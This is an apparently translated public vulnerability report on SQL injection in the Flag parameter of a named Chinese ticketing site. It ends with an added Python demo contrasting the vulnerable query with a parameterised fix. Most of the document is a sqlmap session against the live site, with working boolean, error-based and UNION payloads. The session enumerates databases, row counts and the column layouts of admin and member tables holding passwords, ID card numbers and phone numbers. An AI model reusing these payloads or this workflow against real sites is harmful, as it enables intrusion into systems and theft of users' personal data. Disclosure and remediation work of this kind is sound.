2015-12-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-01-21: The vendor has actively ignored the vulnerability; details disclosed to the public.
Hopefully this isn't a duplicate submission!~~~ I'm testing this while I'm back home on a break; I don't know how late I'll be working tonight, so I'm submitting it first!~~~
First, the address is
http://www.51piao.com/Flight/FlightSale.aspx?Flag=2
The Flag parameter is injectable:
http://www.51piao.com/Flight/FlightSale.aspx?Flag=2'
The test returns:
“/”应用程序中的服务器错误。
字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Exception: 字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。
So there should be an injection here!~~~
[*] starting at 16:15:42
[16:15:42] [INFO] testing connection to the target URL
[16:15:44] [INFO] testing if the target URL is stable. This can take a couple of seconds
[16:15:45] [INFO] target URL is stable
[16:15:45] [INFO] testing if GET parameter 'Flag' is dynamic
[16:15:46] [INFO] confirming that GET parameter 'Flag' is dynamic
[16:15:47] [INFO] GET parameter 'Flag' is dynamic
[16:15:47] [WARNING] reflective value(s) found and filtering out
[16:15:47] [INFO] heuristic (basic) test shows that GET parameter 'Flag' might be injectable
[16:15:47] [INFO] testing for SQL injection on GET parameter 'Flag'
[16:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:15:52] [INFO] GET parameter 'Flag' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:15:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:15:59] [INFO] GET parameter 'Flag' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:15:59] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:16:05] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:16:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:16:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:16:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:16:29] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:33] [INFO] target URL appears to have 1 column in query
[16:16:33] [INFO] GET parameter 'Flag' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'Flag' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
Place: GET
Parameter: Flag
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Flag=2) AND 4749=4749 AND (2763=2763

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Flag=2) AND 7428=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7428=7428) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113))) AND (4091=4091

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: Flag=2) UNION ALL SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CHAR(113)+CHAR(67)+CHAR(114)+CHAR(98)+CHAR(81)+CHAR(79)+CHAR(100)+CHAR(84)+CHAR(89)+CHAR(65)+CHAR(83)+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113)--
---
[16:16:53] [INFO] testing Microsoft SQL Server
[16:16:53] [INFO] confirming Microsoft SQL Server
[16:16:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:37] [INFO] testing Microsoft SQL Server
[16:20:37] [INFO] confirming Microsoft SQL Server
[16:20:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:38] [INFO] fetching current user
current user: 'web61247'
[16:20:38] [INFO] fetching current database
current database: 'www_51piao_com'
[16:20:38] [INFO] testing if current user is DBA
current user is DBA: False
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www_51piao_com

Database: www_51piao_com
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.OrderLog                 | 960682  |
| dbo.TicketPrice              | 370811  |
| dbo.vMemberAll               | 341363  |
| dbo.vTicketPrice             | 248395  |
| dbo.MemberAddrBook           | 205929  |
| dbo.OrderMain                | 179388  |
| dbo.OprLog                   | 178075  |
| dbo.vEmailAll                | 130014  |
| dbo.MemberPointLog           | 126487  |
| dbo.TicketOrderDetail        | 124568  |
| dbo.TicketOrderDetail        | 124568  |
| dbo.TicketOrderDetail        | 124568  |
| dbo.vTicketOrderStat         | 124568  |
| dbo.vFlightTicketOrder       | 121543  |
| dbo.SmsLog                   | 110904  |
| dbo.vTicketOrder             | 106021  |
| dbo.vMobileTemp              | 98098   |
| dbo.vMoibleAll               | 98098   |
| dbo.vMobileAllOrder          | 98088   |
| dbo.vMemberTemp              | 93105   |
| dbo.MemberMoneyLog           | 81838   |
| dbo.TicketPlay               | 81607   |
| dbo.VTicketPlayMag           | 81561   |
| dbo.FlightLog                | 72994   |
| dbo.TrainNew                 | 70195   |
| dbo.TrainNew                 | 70195   |
| dbo.vLoginLog                | 58664   |
| dbo.ImagesTicket             | 37727   |
| dbo.monitor                  | 36593   |
| dbo.FlightOrderDetail        | 31300   |
| dbo.FlightOrderDetail        | 31300   |
| dbo.vFlightOrderDetail       | 21042   |
| dbo.vFlightOrderDetail       | 21042   |
| dbo.vTicketDetail            | 14126   |
| dbo.vTicketMag               | 14126   |
| dbo.OrderPayCard             | 13596   |
| dbo.vOrderPayCard            | 13596   |
| dbo.MemberLog                | 11974   |
| dbo.vFlightTicketSend        | 10295   |
| dbo.AccountAll               | 8329    |
| dbo.TicketPreOrder           | 6293    |
| dbo.vTicketAddrUse           | 5225    |
| dbo.vTicketAddrUse           | 5225    |
| dbo.TicketReview             | 3253    |
| dbo.FlightLogStat            | 2756    |
| dbo.vTicketReviewList        | 2647    |
| dbo.FlightKM                 | 1398    |
| dbo.o_kehu                   | 1317    |
| dbo.ImagesCommon             | 860     |
| dbo.WebTop                   | 858     |
| dbo.JOYCOMPANY               | 786     |
| dbo.VJoyCompanyMag           | 786     |
| dbo.VJoyCompanyMag           | 786     |
| dbo.LinkInfo                 | 780     |
| dbo.CITY                     | 647     |
| dbo.AgentInfo                | 526     |
| dbo.VChinaCity               | 455     |
| dbo.VNewsHelp1               | 416     |
| dbo.VNewsHelp1               | 416     |
| dbo.PointProductOrder        | 293     |
| dbo.PointProductOrder        | 293     |
| dbo.vTicketBig               | 280     |
| dbo.vTicketHomeTop           | 279     |
| dbo.MemberWebUnion           | 210     |
| dbo.vTicketLeft              | 176     |
| dbo.vTicketSmall             | 155     |
| dbo.FlightCityCode           | 152     |
| dbo.FlightSale               | 144     |
| dbo.VFlightSale              | 141     |
| dbo.Area                     | 131     |
| dbo.Users                    | 116     |
| dbo.vUserMag                 | 116     |
| dbo.BlackIp                  | 103     |
| dbo.REGION                   | 96      |
| dbo.vTrainTrade              | 65      |
| dbo.TrainTradeBak            | 60      |
| dbo.TrainTradeBak            | 60      |
| dbo.NewsHelpModule           | 57      |
| dbo.NewsHelpModule           | 57      |
| dbo.sysconstraints           | 54      |
| dbo.vPointProduct1           | 44      |
| dbo.vPointProduct1           | 44      |
| dbo.VTravelLine1             | 35      |
| dbo.VTravelLine1             | 35      |
| dbo.vTravelLineDetail        | 35      |
| dbo.Province                 | 34      |
| dbo.vMobileAllTrain          | 26      |
| web61247.pangolin_test_table | 26      |
| dbo.vTicketTypeCount         | 22      |
| dbo.vTicketTypeCount         | 22      |
| dbo.TempSql                  | 17      |
| dbo.vJoyCompanyTop           | 17      |
| dbo.TicketType               | 14      |
| dbo.OrderPayMethod           | 12      |
| dbo.FlightSpec               | 11      |
| dbo.vFlightSpec              | 11      |
| web61247.D99_Tmp             | 11      |
| dbo.MemberGroup              | 10      |
| dbo.SmsTemplate              | 10      |
| dbo.vSmsTemplate             | 10      |
| dbo.vTemp                    | 10      |
| dbo.BaseCreditCard           | 9       |
| dbo.WebModule                | 9       |
| dbo.vWebCity                 | 8       |
| dbo.WebCity                  | 8       |
| dbo.BlackList                | 7       |
| dbo.SmsEvent                 | 7       |
| dbo.BbsBanner                | 6       |
| dbo.Groups                   | 6       |
| dbo.OrderFlightTakeAddr      | 6       |
| dbo.PointProductType         | 5       |
| dbo.vHomeTicket              | 5       |
| dbo.vSmsModule               | 5       |
| dbo.vHotelOrder              | 4       |
| dbo.syssegments              | 3       |
| dbo.BaseYesNo                | 2       |
| dbo.FlightTicketAddr         | 2       |
| dbo.PriceType                | 2       |
| dbo.CompanySeq               | 1       |
| dbo.FlightSaleTop            | 1       |
| dbo.OrderSeq                 | 1       |
| dbo.TravelCompany            | 1       |
+------------------------------+---------+

Somehow Member was missing when I fetched the counts for the whole database; luckily I found the members table during the last test, so it seems the number of users has grown a bit!~~~

Database: www_51piao_com
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| dbo.Member   | 198778  |
| dbo.vMember  | 198778  |
| dbo.Users    | 116     |
| dbo.vUserMag | 116     |
+--------------+---------+

Database: www_51piao_com
Table: Users
[9 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+

Database: www_51piao_com
Table: vUserMag
[10 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| DepartName    |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+

Database: www_51piao_com
Table: Member
[43 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+

Database: www_51piao_com
Table: vMember
[45 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| City          |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| GroupName     |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+
The data is pretty large, so I won't go any further!~~~~ Also, because of time, I'm in a rush to head out, so I won't test any deeper; I'll test the rest tomorrow!~~~
As above.
Fix by filtering the input.
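As an added example (not part of the original report or the site's code), the following Python reconstructs the query shape that the leaked error reveals, with the Flag value spliced into a parenthesised WHERE clause before the order by on [BeginTimeSort], next to a hardened version that validates Flag as an integer and binds it as a parameter. The FlightSale table and its rows are constructed, and sqlite3 stands in for SQL Server 2000 (a ? placeholder where SqlCommand would use @Flag).

```python
import re
import sqlite3

# Constructed stand-in for the site's FlightSale table (not the real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE FlightSale (Id INTEGER, Flag INTEGER, BeginTimeSort INTEGER)")
    conn.executemany("INSERT INTO FlightSale VALUES (?, ?, ?)",
                     [(1, 2, 30), (2, 2, 10), (3, 1, 20)])
    return conn

def query_vulnerable(conn, flag):
    # Same shape the leaked error reveals: the raw parameter is spliced into a
    # parenthesised WHERE clause followed by "order by [BeginTimeSort] asc".
    sql = "SELECT Id FROM FlightSale WHERE (Flag=" + flag + ") ORDER BY BeginTimeSort ASC"
    return [row[0] for row in conn.execute(sql)]

def query_hardened(conn, flag):
    # Flag selects a sale category, so anything but a short integer is rejected
    # before it gets anywhere near the database.
    if not re.fullmatch(r"[0-9]{1,9}", flag):
        raise ValueError("invalid Flag")
    # The value is bound, never concatenated (sqlite3 uses ?, SqlCommand uses @Flag).
    sql = "SELECT Id FROM FlightSale WHERE (Flag=?) ORDER BY BeginTimeSort ASC"
    return [row[0] for row in conn.execute(sql, (int(flag),))]

def demo():
    conn = make_db()
    out = {"vuln_normal": query_vulnerable(conn, "2")}
    try:
        query_vulnerable(conn, "2'")          # the single-quote probe from the report
        out["vuln_quote"] = "no error"
    except sqlite3.OperationalError:
        out["vuln_quote"] = "syntax error"    # what the ASP.NET error page exposed
    # sqlmap's boolean payload closes the parenthesis and is accepted unchanged.
    out["vuln_payload"] = query_vulnerable(conn, "2) AND 4749=4749 AND (2763=2763")
    out["hard_normal"] = query_hardened(conn, "2")
    rejected = []
    for probe in ("2'", "2) AND 4749=4749 AND (2763=2763"):
        try:
            query_hardened(conn, probe)
        except ValueError:
            rejected.append(probe)
    out["hard_rejected"] = rejected
    return out

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```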
Unable to contact the vendor, or the vendor actively refused.